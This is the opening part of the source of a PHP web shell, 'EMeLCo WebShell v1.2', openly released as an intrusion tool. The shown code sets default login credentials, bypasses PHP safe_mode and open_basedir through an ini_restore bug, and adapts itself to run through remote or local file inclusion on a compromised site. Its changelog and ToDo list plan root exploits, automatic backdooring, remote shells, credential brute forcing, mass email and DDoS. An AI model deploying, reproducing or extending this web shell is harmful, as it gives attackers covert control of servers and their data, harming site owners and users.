/emelco-1.2.php

Large files files are truncated, but you can click here to view the full file

<?php
/*
                   ::::::::::   :::   :::   :::::::::: :::        ::::::::   :::::::: 
                  :+:         :+:+: :+:+:  :+:        :+:       :+:    :+: :+:    :+: 
                 +:+        +:+ +:+:+ +:+ +:+        +:+       +:+        +:+    +:+  
                +#++:++#   +#+  +:+  +#+ +#++:++#   +#+       +#+        +#+    +:+   
               +#+        +#+       +#+ +#+        +#+       +#+        +#+    +#+    
              #+#        #+#       #+# #+#        #+#       #+#    #+# #+#    #+#     
             ########## ###       ### ########## ########## ########   ########       
         :::       ::: :::::::::: :::::::::   ::::::::  :::    ::: :::::::::: :::        :::  
        :+:       :+: :+:        :+:    :+: :+:    :+: :+:    :+: :+:        :+:        :+:   
       +:+       +:+ +:+        +:+    +:+ +:+        +:+    +:+ +:+        +:+        +:+    
      +#+  +:+  +#+ +#++:++#   +#++:++#+  +#++:++#++ +#++:++#++ +#++:++#   +#+        +#+     
     +#+ +#+#+ +#+ +#+        +#+    +#+        +#+ +#+    +#+ +#+        +#+        +#+      
     #+#+# #+#+#  #+#        #+#    #+# #+#    #+# #+#    #+# #+#        #+#        #+#       
     ###   ###   ########## #########   ########  ###    ### ########## ########## ########## 

  EMelCo PHP WebShell v1.2
  Escrita por >> s E t H <<
  seth (at) el-hacker (dot) org
  http://code.google.com/p/emelco/
  http://emelco.66ghz.com/lists/
  
  http://elrincondeseth.wordpress.com/
  http://foro.undersecurity.net/
  http://0verl0ad.blogspot.com/
  
  
  Copyright (c) 2009 2010, EMeLCo
  All rights reserved.
 
  Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 
      * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
      * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
      * Neither the name of the authors nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
  Changelog:
  1.2
    [+] Explota un bug con ini_restore para saltearse safe_mode y open_basedir PHP <= 5.1.6 / 4.4.4
    [!] Cambió el orden de los error_reporting para que sea mas facil debuggear
    [!] Intenta modificar memory_limit
    [!] Al listar archivos los va mostrando de a uno, para no llegar al limite de memoria (funciona bien con los 8mb default)
    [!] Las lineas del textarea de w=shell se acomodan a las lineas de la salida del comando
    [!] Arreglado un bug en archivosdeusuarios(), que hacia que devuelva solo una ubicacion
    [+] Agregado "<whereis ruby" y corregido .htacces por .htaccess en w=info
    
   ToDo:
   [!] Eliminar los mensajes de: "No se puede leer /var/log/messages porque supera los 50000 bytes", o ponerlos como link
   [+] Modificar leerarchivo() para que use shell() con cat
   [+] Agregar rootexploits
   [+] Agregar exploits de php
   [+] Agregar una shell remota tipo datacha0s en varios lenguajes (php, c y perl seguro)
   [+] Agregar backdoorizacion automática
   [+] Agregar descripciones en los textarea e input--> onfocus="this.value=''; this.onfocus=null;"
   [!] Mejorar las funciones para leer y escribir archivos
   [+] Agregar brute force de ssh
   [+] Agregar brute force de ftp
   [+] Agregar brute force de mysql
   [+] Agregar navegador de sql
   [+] Agregar para mover y copiar los archivos
   [+] Ejecutar comandos con http://us3.php.net/manual/en/function.pcntl-exec.php y http://ar2.php.net/manual/en/function.proc-open.php
   [+] Agregar para copiar y mover archivos
   [+] Enviar muchos emails de un saque
   [+] DDoS ?
   [+] Poner todas las imágenes en un solo archivo y mostrarlas con css para ahorrar peticiones
   [+] Usar ajax
   [+] Mostrar los módulos instalados
   [+] Agregar comandos de la WSO, r57 y las variaciones de c99
   [!] si en w=editar haces click en el text y apretas enter, es como apretar guardar
   [!] ?w=subir tiene que usar escribirarchivo()
 
*/

//Usuario (Dejalo vacio para que no pida clave):
$nombre_usuario = 'seth';
//hash sha1 de la clave
$clave_usuario = 'a0f1ba7debe4a2049b0f84d7dd95009a812f0b1a'; //"EMeLCo"

//Cambia esto para usar la shell con LFI
//$rfiurl = "?page=../../../error_log&";
$rfiurl = false;

error_reporting(0); //final
//error_reporting(E_ALL); //desarrollo

/**/ 

// http://securityreason.com/achievement_securityalert/42
if(strtolower(ini_get("safe_mode"))=="on"){
    ini_restore("safe_mode");
}
if($_COOKIE["openBasedirBypass"]=="true"){
    ini_restore("open_basedir");
}

set_time_limit(0);
ini_set('memory_limit', -1);

$nombre = 'EMeLCo WebShell v1.2';

// de php.net para contrarrestar magic_quotes_gpc
if (get_magic_quotes_gpc()) {
    function stripslashes_deep($value)
    {
        $value = is_array($value) ?
                    array_map('stripslashes_deep', $value) :
                    stripslashes($value);
        
        return $value;
    }

    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

//Parcheamos la url para que ande con RFI
if (!$rfiurl){
    $rfiurl = "?";
    $include = "&";
    foreach (explode("&",getenv("QUERY_STRING")) as $v) {
        $v = explode("=",$v);
        $name = urldecode($v[0]);
        $value = urldecode($v[1]);
        foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { 
            if (strpos($value,$needle) === 0) {
                $rfiurl .= urlencode($name)."=".urlencode($value)."&";}
        }
    }  
    unset($v);
    unset($name);
    unset($value);
}
$rfiurl = htmlentities($rfiurl);


if (isset($nombre_usuario) and ($nombre_usuario != "")){ //si tiene clave
    if ( ($_COOKIE["u"] != $nombre_usuario) or ($_COOKIE["c"] != $clave_usuario) ){ //si no está logueado muestra un formulario que pide la clave
        echo'
            <html><head><script>
                function createCookie(name,value,days) {
                    if (days) {
                        var date = new Date();
                        date.setTime(date.getTime()+(days*24*60*60*1000));
                        var expires = "; expires="+date.toGMTString();
                    }
                    else var expires = "";
                    document.cookie = name+"="+value+expires+"; path=/";
                }
                function saveIt() {
                    var x = document.forms["f"].u.value;
                    createCookie("u",x,7);
                    var x = document.forms["f"].c.value;
                    createCookie("c",sha1(x),7);
                    document.reload();
                }
                '.base64_decode('ZnVuY3Rpb24gdXRmOF9lbmNvZGUgKCBhcmdTdHJpbmcgKSB7DQogICAgLy8gaHR0cDovL2tldmluLnZhbnpvbm5ldmVsZC5uZXQNCiAgICAvLyArICAgb3JpZ2luYWwgYnk6IFdlYnRvb2xraXQuaW5mbyAoaHR0cDovL3d3dy53ZWJ0b29sa2l0LmluZm8vKQ0KICAgIC8vICsgICBpbXByb3ZlZCBieTogS2V2aW4gdmFuIFpvbm5ldmVsZCAoaHR0cDovL2tldmluLnZhbnpvbm5ldmVsZC5uZXQpDQogICAgLy8gKyAgIGltcHJvdmVkIGJ5OiBzb3diZXJyeQ0KICAgIC8vICsgICAgdHdlYWtlZCBieTogSmFjaw0KICAgIC8vICsgICBidWdmaXhlZCBieTogT25ubyBNYXJzbWFuDQogICAgLy8gKyAgIGltcHJvdmVkIGJ5OiBZdmVzIFN1Y2FldA0KICAgIC8vICsgICBidWdmaXhlZCBieTogT25ubyBNYXJzbWFuDQogICAgLy8gKyAgIGJ1Z2ZpeGVkIGJ5OiBVbHJpY2gNCiAgICAvLyAqICAgICBleGFtcGxlIDE6IHV0ZjhfZW5jb2RlKCdLZXZpbiB2YW4gWm9ubmV2ZWxkJyk7DQogICAgLy8gKiAgICAgcmV0dXJucyAxOiAnS2V2aW4gdmFuIFpvbm5ldmVsZCcNCiANCiAgICB2YXIgc3RyaW5nID0gKGFyZ1N0cmluZysnJyk7IC8vIC5yZXBsYWNlKC9cclxuL2csICJcbiIpLnJlcGxhY2UoL1xyL2csICJcbiIpOw0KIA0KICAgIHZhciB1dGZ0ZXh0ID0gIiI7DQogICAgdmFyIHN0YXJ0LCBlbmQ7DQogICAgdmFyIHN0cmluZ2wgPSAwOw0KIA0KICAgIHN0YXJ0ID0gZW5kID0gMDsNCiAgICBzdHJpbmdsID0gc3RyaW5nLmxlbmd0aDsNCiAgICBmb3IgKHZhciBuID0gMDsgbiA8IHN0cmluZ2w7IG4rKykgew0KICAgICAgICB2YXIgYzEgPSBzdHJpbmcuY2hhckNvZGVBdChuKTsNCiAgICAgICAgdmFyIGVuYyA9IG51bGw7DQogDQogICAgICAgIGlmIChjMSA8IDEyOCkgew0KICAgICAgICAgICAgZW5kKys7DQogICAgICAgIH0gZWxzZSBpZiAoYzEgPiAxMjcgJiYgYzEgPCAyMDQ4KSB7DQogICAgICAgICAgICBlbmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKChjMSA+PiA2KSB8IDE5MikgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKChjMSAmIDYzKSB8IDEyOCk7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBlbmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKChjMSA+PiAxMikgfCAyMjQpICsgU3RyaW5nLmZyb21DaGFyQ29kZSgoKGMxID4+IDYpICYgNjMpIHwgMTI4KSArIFN0cmluZy5mcm9tQ2hhckNvZGUoKGMxICYgNjMpIHwgMTI4KTsNCiAgICAgICAgfQ0KICAgICAgICBpZiAoZW5jICE9PSBudWxsKSB7DQogICAgICAgICAgICBpZiAoZW5kID4gc3RhcnQpIHsNCiAgICAgICAgICAgICAgICB1dGZ0ZXh0ICs9IHN0cmluZy5zdWJzdHJpbmcoc3RhcnQsIGVuZCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICB1dGZ0ZXh0ICs9IGVuYzsNCiAgICAgICAgICAgIHN0YXJ0ID0gZW5kID0gbisxOw0KICAgICAgICB9DQogICAgfQ0KIA0KICAgIGlmIChlbmQgPiBzdGFydCkgew0KICAgICAgICB1dGZ0ZXh0ICs9IHN0cmluZy5zdWJzdHJpbmcoc3RhcnQsIHN0cmluZy5sZW5ndGgpOw0KICAgIH0NCiANCiAgICByZXR1cm4gdXRmdGV4dDsNCn0=').base64_decode('ZnVuY3Rpb24gc2hhMSAoc3RyKSB7DQoNCiAgICAvLyBodHRwOi8va2V2aW4udmFuem9ubmV2ZWxkLm5ldA0KDQogICAgLy8gKyAgIG9yaWdpbmFsIGJ5OiBXZWJ0b29sa2l0LmluZm8gKGh0dHA6Ly93d3cud2VidG9vbGtpdC5pbmZvLykNCg0KICAgIC8vICsgbmFtZXNwYWNlZCBieTogTWljaGFlbCBXaGl0ZSAoaHR0cDovL2dldHNwcmluay5jb20pDQoNCiAgICAvLyArICAgICAgaW5wdXQgYnk6IEJyZXR0IFphbWlyIChodHRwOi8vYnJldHQtemFtaXIubWUpDQoNCiAgICAvLyArICAgaW1wcm92ZWQgYnk6IEtldmluIHZhbiBab25uZXZlbGQgKGh0dHA6Ly9rZXZpbi52YW56b25uZXZlbGQubmV0KQ0KDQogICAgLy8gLSAgICBkZXBlbmRzIG9uOiB1dGY4X2VuY29kZQ0KDQogICAgLy8gKiAgICAgZXhhbXBsZSAxOiBzaGExKCdLZXZpbiB2YW4gWm9ubmV2ZWxkJyk7DQoNCiAgICAvLyAqICAgICByZXR1cm5zIDE6ICc1NDkxNmQyZTYyZjY1YjNhZmE2ZTE5MmU2YTYwMWNkYmU1Y2I1ODk3Jw0KDQogDQoNCiAgICB2YXIgcm90YXRlX2xlZnQgPSBmdW5jdGlvbiAobixzKSB7DQoNCiAgICAgICAgdmFyIHQ0ID0gKCBuPDxzICkgfCAobj4+PigzMi1zKSk7DQoNCiAgICAgICAgcmV0dXJuIHQ0Ow0KDQogICAgfTsNCg0KIA0KDQogICAgLyp2YXIgbHNiX2hleCA9IGZ1bmN0aW9uICh2YWwpIHsgLy8gTm90IGluIHVzZTsgbmVlZGVkPw0KDQogICAgICAgIHZhciBzdHI9IiI7DQoNCiAgICAgICAgdmFyIGk7DQoNCiAgICAgICAgdmFyIHZoOw0KDQogICAgICAgIHZhciB2bDsNCg0KIA0KDQogICAgICAgIGZvciAoIGk9MDsgaTw9NjsgaSs9MiApIHsNCg0KICAgICAgICAgICAgdmggPSAodmFsPj4+KGkqNCs0KSkmMHgwZjsNCg0KICAgICAgICAgICAgdmwgPSAodmFsPj4+KGkqNCkpJjB4MGY7DQoNCiAgICAgICAgICAgIHN0ciArPSB2aC50b1N0cmluZygxNikgKyB2bC50b1N0cmluZygxNik7DQoNCiAgICAgICAgfQ0KDQogICAgICAgIHJldHVybiBzdHI7DQoNCiAgICB9OyovDQoNCiANCg0KICAgIHZhciBjdnRfaGV4ID0gZnVuY3Rpb24gKHZhbCkgew0KDQogICAgICAgIHZhciBzdHI9IiI7DQoNCiAgICAgICAgdmFyIGk7DQoNCiAgICAgICAgdmFyIHY7DQoNCiANCg0KICAgICAgICBmb3IgKGk9NzsgaT49MDsgaS0tKSB7DQoNCiAgICAgICAgICAgIHYgPSAodmFsPj4+KGkqNCkpJjB4MGY7DQoNCiAgICAgICAgICAgIHN0ciArPSB2LnRvU3RyaW5nKDE2KTsNCg0KICAgICAgICB9DQoNCiAgICAgICAgcmV0dXJuIHN0cjsNCg0KICAgIH07DQoNCiANCg0KICAgIHZhciBibG9ja3N0YXJ0Ow0KDQogICAgdmFyIGksIGo7DQoNCiAgICB2YXIgVyA9IG5ldyBBcnJheSg4MCk7DQoNCiAgICB2YXIgSDAgPSAweDY3NDUyMzAxOw0KDQogICAgdmFyIEgxID0gMHhFRkNEQUI4OTsNCg0KICAgIHZhciBIMiA9IDB4OThCQURDRkU7DQoNCiAgICB2YXIgSDMgPSAweDEwMzI1NDc2Ow0KDQogICAgdmFyIEg0ID0gMHhDM0QyRTFGMDsNCg0KICAgIHZhciBBLCBCLCBDLCBELCBFOw0KDQogICAgdmFyIHRlbXA7DQoNCiANCg0KICAgIHN0ciA9IHRoaXMudXRmOF9lbmNvZGUoc3RyKTsNCg0KICAgIHZhciBzdHJfbGVuID0gc3RyLmxlbmd0aDsNCg0KIA0KDQogICAgdmFyIHdvcmRfYXJyYXkgPSBbXTsNCg0KICAgIGZvciAoaT0wOyBpPHN0cl9sZW4tMzsgaSs9NCkgew0KDQogICAgICAgIGogPSBzdHIuY2hhckNvZGVBdChpKTw8MjQgfCBzdHIuY2hhckNvZGVBdChpKzEpPDwxNiB8DQoNCiAgICAgICAgc3RyLmNoYXJDb2RlQXQoaSsyKTw8OCB8IHN0ci5jaGFyQ29kZUF0KGkrMyk7DQoNCiAgICAgICAgd29yZF9hcnJheS5wdXNoKCBqICk7DQoNCiAgICB9DQoNCiANCg0KICAgIHN3aXRjaCAoc3RyX2xlbiAlIDQpIHsNCg0KICAgICAgICBjYXNlIDA6DQoNCiAgICAgICAgICAgIGkgPSAweDA4MDAwMDAwMDsNCg0KICAgICAgICBicmVhazsNCg0KICAgICAgICBjYXNlIDE6DQoNCiAgICAgICAgICAgIGkgPSBzdHIuY2hhckNvZGVBdChzdHJfbGVuLTEpPDwyNCB8IDB4MDgwMDAwMDsNCg0KICAgICAgICBicmVhazsNCg0KICAgICAgICBjYXNlIDI6DQoNCiAgICAgICAgICAgIGkgPSBzdHIuY2hhckNvZGVBdChzdHJfbGVuLTIpPDwyNCB8IHN0ci5jaGFyQ29kZUF0KHN0cl9sZW4tMSk8PDE2IHwgMHgwODAwMDsNCg0KICAgICAgICBicmVhazsNCg0KICAgICAgICBjYXNlIDM6DQoNCiAgICAgICAgICAgIGkgPSBzdHIuY2hhckNvZGVBdChzdHJfbGVuLTMpPDwyNCB8IHN0ci5jaGFyQ29kZUF0KHN0cl9sZW4tMik8PDE2IHwgc3RyLmNoYXJDb2RlQXQoc3RyX2xlbi0xKTw8OCAgICB8IDB4ODA7DQoNCiAgICAgICAgYnJlYWs7DQoNCiAgICB9DQoNCiANCg0KICAgIHdvcmRfYXJyYXkucHVzaCggaSApOw0KDQogDQoNCiAgICB3aGlsZSAoKHdvcmRfYXJyYXkubGVuZ3RoICUgMTYpICE9IDE0ICkge3dvcmRfYXJyYXkucHVzaCggMCApO30NCg0KIA0KDQogICAgd29yZF9hcnJheS5wdXNoKCBzdHJfbGVuPj4+MjkgKTsNCg0KICAgIHdvcmRfYXJyYXkucHVzaCggKHN0cl9sZW48PDMpJjB4MGZmZmZmZmZmICk7DQoNCiANCg0KICAgIGZvciAoIGJsb2Nrc3RhcnQ9MDsgYmxvY2tzdGFydDx3b3JkX2FycmF5Lmxlbmd0aDsgYmxvY2tzdGFydCs9MTYgKSB7DQoNCiAgICAgICAgZm9yIChpPTA7IGk8MTY7IGkrKykge1dbaV0gPSB3b3JkX2FycmF5W2Jsb2Nrc3RhcnQraV07fQ0KDQogICAgICAgIGZvciAoaT0xNjsgaTw9Nzk7IGkrKykge1dbaV0gPSByb3RhdGVfbGVmdChXW2ktM10gXiBXW2ktOF0gXiBXW2ktMTRdIF4gV1tpLTE2XSwgMSk7fQ0KDQogDQoNCiANCg0KICAgICAgICBBID0gSDA7DQoNCiAgICAgICAgQiA9IEgxOw0KDQogICAgICAgIEMgPSBIMjsNCg0KICAgICAgICBEID0gSDM7DQoNCiAgICAgICAgRSA9IEg0Ow0KDQogDQoNCiAgICAgICAgZm9yIChpPSAwOyBpPD0xOTsgaSsrKSB7DQoNCiAgICAgICAgICAgIHRlbXAgPSAocm90YXRlX2xlZnQoQSw1KSArICgoQiZDKSB8ICh+QiZEKSkgKyBFICsgV1tpXSArIDB4NUE4Mjc5OTkpICYgMHgwZmZmZmZmZmY7DQoNCiAgICAgICAgICAgIEUgPSBEOw0KDQogICAgICAgICAgICBEID0gQzsNCg0KICAgICAgICAgICAgQyA9IHJvdGF0ZV9sZWZ0KEIsMzApOw0KDQogICAgICAgICAgICBCID0gQTsNCg0KICAgICAgICAgICAgQSA9IHRlbXA7DQoNCiAgICAgICAgfQ0KDQogDQoNCiAgICAgICAgZm9yIChpPTIwOyBpPD0zOTsgaSsrKSB7DQoNCiAgICAgICAgICAgIHRlbXAgPSAocm90YXRlX2xlZnQoQSw1KSArIChCIF4gQyBeIEQpICsgRSArIFdbaV0gKyAweDZFRDlFQkExKSAmIDB4MGZmZmZmZmZmOw0KDQogICAgICAgICAgICBFID0gRDsNCg0KICAgICAgICAgICAgRCA9IEM7DQoNCiAgICAgICAgICAgIEMgPSByb3RhdGVfbGVmdChCLDMwKTsNCg0KICAgICAgICAgICAgQiA9IEE7DQoNCiAgICAgICAgICAgIEEgPSB0ZW1wOw0KDQogICAgICAgIH0NCg0KIA0KDQogICAgICAgIGZvciAoaT00MDsgaTw9NTk7IGkrKykgew0KDQogICAgICAgICAgICB0ZW1wID0gKHJvdGF0ZV9sZWZ0KEEsNSkgKyAoKEImQykgfCAoQiZEKSB8IChDJkQpKSArIEUgKyBXW2ldICsgMHg4RjFCQkNEQykgJiAweDBmZmZmZmZmZjsNCg0KICAgICAgICAgICAgRSA9IEQ7DQoNCiAgICAgICAgICAgIEQgPSBDOw0KDQogICAgICAgICAgICBDID0gcm90YXRlX2xlZnQoQiwzMCk7DQoNCiAgICAgICAgICAgIEIgPSBBOw0KDQogICAgICAgICAgICBBID0gdGVtcDsNCg0KICAgICAgICB9DQoNCiANCg0KICAgICAgICBmb3IgKGk9NjA7IGk8PTc5OyBpKyspIHsNCg0KICAgICAgICAgICAgdGVtcCA9IChyb3RhdGVfbGVmdChBLDUpICsgKEIgXiBDIF4gRCkgKyBFICsgV1tpXSArIDB4Q0E2MkMxRDYpICYgMHgwZmZmZmZmZmY7DQoNCiAgICAgICAgICAgIEUgPSBEOw0KDQogICAgICAgICAgICBEID0gQzsNCg0KICAgICAgICAgICAgQyA9IHJvdGF0ZV9sZWZ0KEIsMzApOw0KDQogICAgICAgICAgICBCID0gQTsNCg0KICAgICAgICAgICAgQSA9IHRlbXA7DQoNCiAgICAgICAgfQ0KDQogDQoNCiAgICAgICAgSDAgPSAoSDAgKyBBKSAmIDB4MGZmZmZmZmZmOw0KDQogICAgICAgIEgxID0gKEgxICsgQikgJiAweDBmZmZmZmZmZjsNCg0KICAgICAgICBIMiA9IChIMiArIEMpICYgMHgwZmZmZmZmZmY7DQoNCiAgICAgICAgSDMgPSAoSDMgKyBEKSAmIDB4MGZmZmZmZmZmOw0KDQogICAgICAgIEg0ID0gKEg0ICsgRSkgJiAweDBmZmZmZmZmZjsNCg0KICAgIH0NCg0KIA0KDQogICAgdGVtcCA9IGN2dF9oZXgoSDApICsgY3Z0X2hleChIMSkgKyBjdnRfaGV4KEgyKSArIGN2dF9oZXgoSDMpICsgY3Z0X2hleChINCk7DQoNCiAgICByZXR1cm4gdGVtcC50b0xvd2VyQ2FzZSgpOw0KDQp9').'
            </script></head><body>';
                if($clave_usuario == 'a0f1ba7debe4a2049b0f84d7dd95009a812f0b1a'){
                    echo '<div style="font-weight: bold; color: #CD2626;">&iexcl;ATENCI&Oacute;N, no se cambi&oacute; la clave por defecto!</div><br>';
                }                
            echo '<form name="f" action="'.$rfiurl.'" method="POST">
                Usuario: <input name="u" type="text"><br>Clave: <input name="c" type="password"><br><input type="submit" value="Entrar" onclick="saveIt()">
            </form></body></html>
        ';
        die();
    }
}

// Con esto mostramos las imagenes. Va arriba porque no se puede mandar nada antes
if ($_GET["w"]=="img"){
    Header('Content-type: image/gif');
    if($_GET["imagen"]=="carpeta"){
        die(base64_decode('R0lGODlhEAAQAMQfAOvGUf7ztuvPMf/78/fkl/Pbg+u8Rvjqteu2Pf3zxPz36Pz0z+vTmPzurPvuw/npofbjquvNefHVduuyN+uuMu3Oafbgjfnqvf/3zv/3xevPi+vRjP/20/bmsP///////yH5BAEAAB8ALAAAAAAQABAAAAV24CeOZGmepqeqqOgxjBZFa+19r4ftWQUAgqDgltthMshMIJAZ4jYDHsBARSAmFOJvq+g6HIdEFgcYmBWNxoNAsDjGHgBnmV5bCoUDHLBIq9sFEhIdcAYJdYASFRUQhQkLCwkOFwcdEBAXhVabE52ecDahKy0oIQA7'));
    }elseif($_GET["imagen"]=="ejecutable"){
        die(base64_decode('R0lGODlhEAAQAMQfAESUKF/CPoXZVn3VUihXGGXGQU6qL/b79HHNSdTvyy9nHD6HJnfRTYDWVI7eXIrcWonbWXrTT0mhLGnJRG3LRyVPFnTPSzZ0Ib3mr460gLLiocXpuCNMFez46P///////yH5BAEAAB8ALAAAAAAQABAAAAWJ4Pd5ZGl6ougZbCtJALCgo5EdXa53h3ahq4PD8YAIGoMII6EAGjpEoyDJsGwIzk5R4GkoLYgrUNKRkqoIyqYy7giOpfRkDVx0kBESZVIoaDh1HVQeCBN8AX9AFx1faX0BiIAjCgdoewWQARiSHgoZCRuhGxqkGBmSIwQVqxytrqgqJycptLW2HyEAOw=='));
    }elseif($_GET["imagen"]=="enlace"){
        die(base64_decode('R0lGODlhEAAQANUkAHBwcMXFxaioqJqamtHR0XNzc6SkpJeXl6CgoNXV1ZiYmHd3d8fHx6Kioo2NjZubm6GhoX9/f4qKipSUlKenp5CQkJOTk6Ojo3t7e6WlpZ2dnX19fZ+fn4SEhHJycn5+foWFhZ6entra2v///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACQALAAAAAAQABAAAAZmQJJwSCwaj0jSaMlMjgSUjAGCGB2fI1GCwAg8rEKmYGRAcAYKRWDCHIXe78vyAH8vRXg8SBjJ45cggYEDSwUAh4dtDSMHFRIdHxgBC01hGllbXR5gRSMWDiAbCwWcRm1LSamqq6pBADs='));
    }elseif($_GET["imagen"]=="flechad"){
        die(base64_decode('R0lGODlhEAAQALMLAJLNXpDEaZPNX4/NU5bUWJnXWpDNVIvFWXyuWmOPRf///////wAAAAAAAAAAAAAAACH5BAEAAAsALAAAAAAQABAAAAQvcMlJq704Z6U0VUm3cWC4JWgCmBc4GESxihUIAIGAsHWaHLwaCUU7FUeepHJpiQAAOw=='));
    }elseif($_GET["imagen"]=="archivo"){
        die(base64_decode('R0lGODlhEAAQAMQfAMfj/uzx9rvc/eXt9YivyHaXtFdwkZXK/KvU+0lVa/L2+rba/KTR+4m77FJhe67T5UNLXNXn8MDf/bHX/JrA1qjL3t7n7ykxQz5FVeLp8LDR48vM0Z7O+9Xb5P///////yH5BAEAAB8ALAAAAAAQABAAAAWPoCeO5PidXvRoFUURRCEXHvpEQ5DrQ98YNY9mACgWJUhF4yeqKIwApECgqDpElOdRulhMFFdPdisRdCcIsIjwlJon6HRireB6EQgGYzD3FAJccXocAxAif1N3eQwcHBmGfgFmd4MHBxYYhwpveIwclgGZHgYdCjwZqBkWARsXhwawDg4JCRAQGBgXYSW8JCEAOw=='));
    }elseif($_GET["imagen"]=="descargar"){
        die(base64_decode('R0lGODlhEAAQAMQfAJLNW3aXtJrM++vx9+Xt9YivyKTR+8fj/ldwkUlVa73e/dXb5PH1+mGNRPDx8bPY/Im77H6xW1Jhe7TR4ENLXNXn8PX4+vv7+5rA1qjL3uDo7ykxQz5FVWOPRf///////yH5BAEAAB8ALAAAAAAQABAAAAWWoCeO5PidXjVNGYYVRSAHHjpVxJDrRA8hNc+EcCgWFUgG5CfKWIydaEfBqEpEmGexA4h0HmDG1ZOFdr/hcYFxkAIAUgMjIVorLtw3oHExEOgeAQNJHRERDQ4GfhQigkgPDg2IBgICGoyBg2CQiZWWHI0WCpuKlJUOoB4ICww8BBqwGg4TG40ItxISCQkUFBwcG2MlwyQhADs='));
    }elseif($_GET["imagen"]=="editar"){
        die(base64_decode('R0lGODlhEAAQAMQAAGB3lYivyMDf/XiZt+Ts9ajT/Mbh/UlVa/P2+bLY/FRlfu3x9ZzN++Xy/rTR4ENLXN7v/tTk8Jm/1enx96jL3uDo7ykxQz5FVb2JAP+8Bv/RV6HQ/FSr9qfR+jhllf///yH5BAAAAAAALAAAAAAQABAAAAWV4CeOZClGjkNJUhAMsOdJohMRUz4RvNdxntrEQCQKGj6gQkRBFAXHpAex/EicBijy54FQRddslAspfD8BhBZDLpgPovQRo8l0C50NAf4ZLBp0GRhleXoPIn4RdYN4GxsMFYd9CwkKlgoAAwybFReICAkJeAUDAKYAC54fABEIOzwEFbILDhaImJcHBw8PFxcWVSbCIiEAOw=='));
    }elseif($_GET["imagen"]=="eliminar"){
        die(base64_decode('R0lGODlhEAAQAMQfAPMyMpfL/HSUseYTE/5WVrzd/e3x9eXs9VdwkarU+0pXbbba/ISqxaLQ+/74+MLg/Ym77PD1+v+IiNrf51Jhe0RNX/729rHX/CkxQz9GVsvM0f7IyNRBRuDo8P///////yH5BAEAAB8ALAAAAAAQABAAAAWSoOdYnlie5ac63OBt3MTMQu2p5TAQXhQdwAMEcSsRBoDSY1mIQIYigIsg8TCbPorHMqieHoXCYnGJaL9LsJicMJcYkfT6ckm0Fe84eFy3Nw54HgwGamwJDYgHFSUCBmGGiA0BHYsejXN+kpMZjBFifYgBogacHggTEQZBHawdBhoYjAizFBQKChUVGRkYZyi/wCEAOw=='));
    }elseif($_GET["imagen"]=="comandos"){
        die(base64_decode('R0lGODlhEAAQAMQfAHSUstdxbU1Zbvz9/4CwzVZtjeTs9Njq9+rx9o7B8d7LzbjTsISyhUiCRvb5/K7S5NXd36LQ+7TZ/PP2+sPh/ajL3ikxQz9HV+Hp8Jq/1czkt5PGeDhzKs9XUv///////yH5BAEAAB8ALAAAAAAQABAAAAWSoCeO5Pid3vE8VZYRBCADHvocBuKIgzcZiULN89D1Ap1AwDNAEISeyqDjQXau1M4AiriKlh7vFSK6DhrkMnWa1VIajLB3EWGb3wS5Z9GIOMRaDRsaIg8cDWwiGGYNcgoMbGkAUwMSenUdDhciAA4DlQciB3VNmx4FEBMIBqwYrhgIChacBbUFArgXuhcWAiW/vyEAOw=='));
    }elseif($_GET["imagen"]=="archivonuevo"){
        die(base64_decode('R0lGODlhEAAQANUoAOLp8ElVa0NLXIivyJXK/D5FVYm77N7n7ykxQ5rA1svM0YS8O4C4OJXJSInAP5fLS362N4/ERJLHR5DFRdXb5JbKStXn8HqzM4vAQJ7O+1Jhe1dwkezx9nKsLeXt9XaXtKTR+7HX/PL2+sDf/bvc/avU+7ba/P///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACgALAAAAAAQABAAAAaXwJNwSByijifLqdM5JQaDj/RzQgofjaFn6zFsqsuKJOJojs4ig1fYmWAWEDOJJKpriIzLcEQymUIid05LZnx+ISWBQgNEc3+IiQGLImd9fyUlICAekicfHJWXmSAZHgJCn46QmhkZAKeeHJaIrAQEBwWoIn2rrbYcuScbFCIcWwDIAAccCgioG9AaGgEBAgIFBQiCRdxEQQA7'));
    }elseif($_GET["imagen"]=="carpetanueva"){
